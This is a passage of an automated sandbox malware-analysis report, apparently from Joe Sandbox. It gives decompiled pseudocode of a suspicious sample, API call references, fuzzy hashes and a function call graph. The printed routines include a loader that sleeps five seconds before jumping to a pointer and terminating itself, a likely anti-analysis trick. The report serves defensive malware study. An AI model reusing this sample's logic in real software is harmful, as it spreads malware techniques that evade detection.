                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                    • String ID:
                    • API String ID: 3521780317-0
                    • Opcode ID: a42a3ee6f32d1cdb8300804fc061515c9dcfb40dd5d43054b99106fa7cad4cef
                    • Instruction ID: 036da38fd2b0aedff4db4488427372200426c576a814986434c939e40ca0c7b3
                    • Opcode Fuzzy Hash: a42a3ee6f32d1cdb8300804fc061515c9dcfb40dd5d43054b99106fa7cad4cef
                    • Instruction Fuzzy Hash: 05F04932A04310EAD621FB77880274A32A0AF00729F11867FE5557B2D3CB7C9D12CA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00405F60(void* __ebx, void* __edi, intOrPtr* __esi) {
                    				intOrPtr _t17;
                    				void* _t26;
                    				intOrPtr* _t28;
                    				void* _t29;
                    				void* _t30;
                    
                    				_t28 = __esi;
                    				_t19 = __ebx;
                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                    				E0040487B(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                    				 *((intOrPtr*)(E00406A5A(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                    				_t17 = E00406A5A(_t19, _t26, _t30);
                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                    							_t17 = E00404854( *((intOrPtr*)(_t28 + 0x18)));
                    							_t38 = _t17;
                    							if(_t17 != 0) {
                    								_push( *((intOrPtr*)(_t29 + 0x10)));
                    								_push(_t28);
                    								return E00405CF8(_t38);
                    							}
                    						}
                    					}
                    				}
                    				return _t17;
                    			}








                    0x00405f60
                    0x00405f60
                    0x00405f63
                    0x00405f69
                    0x00405f77
                    0x00405f7d
                    0x00405f85
                    0x00405f91
                    0x00405f99
                    0x00405fa1
                    0x00405fb5
                    0x00405fc0
                    0x00405fc6
                    0x00405fc8
                    0x00405fca
                    0x00405fcd
                    0x00000000
                    0x00405fd4
                    0x00405fc8
                    0x00405fb5
                    0x00405fa1
                    0x00405fd5

                    APIs
                      • Part of subcall function 0040487B: __getptd.LIBCMT ref: 00404881
                      • Part of subcall function 0040487B: __getptd.LIBCMT ref: 00404891
                    • __getptd.LIBCMT ref: 00405F6F
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405F7D
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: f7bd628e02896e3b0ee480ada6aed6003973c84ee745a5278aa14c7bcef4c16f
                    • Instruction ID: 60db7ef5a43f9f1ae265a39f2d0fbc4b15c7f667e9ba76e2138882fac8c69323
                    • Opcode Fuzzy Hash: f7bd628e02896e3b0ee480ada6aed6003973c84ee745a5278aa14c7bcef4c16f
                    • Instruction Fuzzy Hash: 5D017835800A068ADF24AF21C444AAFB7B6EF04325F24843FE051766D1DB3C8991CF29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                    Control-flow Graph

                    C-Code - Quality: 23%
                    			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t11;
                    				void* _t16;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    
                    				_t22 = __eflags;
                    				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                    				_t17 = _a4;
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                    				if(_t11 != 0) {
                    					_push(_a16);
                    					_push(_v8);
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, _t20); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				return __eax;
                    			}














                    0x0040180c
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000006.00000002.436926362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                    • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                    • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                    • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000006.00000002.436926362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                    • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                    • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                    • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 17%
                    			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t11;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t23 = __eflags;
                    				asm("out 0x95, eax");
                    				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t17 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				if(_t11 != 0) {
                    					_push( *((intOrPtr*)(_t22 + 0x14)));
                    					_push( *((intOrPtr*)(_t22 - 4)));
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, __edi); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}







                    0x00401822
                    0x00401822
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000006.00000002.436926362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                    • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                    • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                    • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 17%
                    			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t23 = __eflags;
                    				asm("sbb ebx, ebp");
                    				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t17 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				if(_t11 != 0) {
                    					_push( *((intOrPtr*)(_t22 + 0x14)));
                    					_push( *((intOrPtr*)(_t22 - 4)));
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, __edi); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}








                    0x00401826
                    0x00401826
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000006.00000002.436926362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                    • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                    • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                    • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 20%
                    			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t10;
                    				void* _t13;
                    				intOrPtr* _t19;
                    				void* _t22;
                    				void* _t25;
                    
                    				_t26 = __eflags;
                    				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t19 =  *((intOrPtr*)(_t25 + 8));
                    				Sleep(0x1388);
                    				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                    				if(_t13 != 0) {
                    					_push( *((intOrPtr*)(_t25 + 0x14)));
                    					_push( *((intOrPtr*)(_t25 - 4)));
                    					_push(_t13);
                    					_push(_t19); // executed
                    					L00401455(0x60, _t22, __edi); // executed
                    				}
                    				 *_t19(0xffffffff, 0); // executed
                    				_t19 = _t19 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}








                    0x00401834
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000006.00000002.436926362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                    • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                    • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                    • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                    Uniqueness

                    Uniqueness Score: -1.00%